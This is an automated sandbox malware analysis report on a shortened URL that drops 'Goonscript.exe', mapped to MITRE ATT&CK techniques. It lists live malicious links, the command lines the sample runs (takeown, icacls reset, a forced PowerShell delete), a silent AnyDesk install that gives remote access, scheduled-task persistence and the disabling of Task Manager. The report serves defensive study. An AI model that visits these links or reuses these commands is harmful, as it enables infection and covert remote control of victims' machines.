Malware Analysis Report

2024-12-07 14:56

Sample ID 241004-dsgc4a1gjm
Target http://rb.gy/g44izl
Tags
discovery evasion execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file http://rb.gy/g44izl was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion execution exploit

Disables Task Manager via registry modification

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops file in System32 directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies data under HKEY_USERS

Views/modifies file attributes

Modifies registry class

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-04 03:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-04 03:16

Reported

2024-10-04 03:24

Platform

win10v2004-20240802-en

Max time kernel

475s

Max time network

475s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl

Signatures

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\Goonscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\locked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\ProgramData\stn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db C:\ProgramData\Anydesk.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Anydesk.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Anydesk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Anydesk.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\ProgramData\Anydesk.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{B27B3CB8-01DD-4B4E-B437-D87785F51D84} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4088 wrote to memory of 1836 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=3544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4104 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8

C:\Users\Admin\Downloads\Goonscript.exe

"C:\Users\Admin\Downloads\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe

"C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

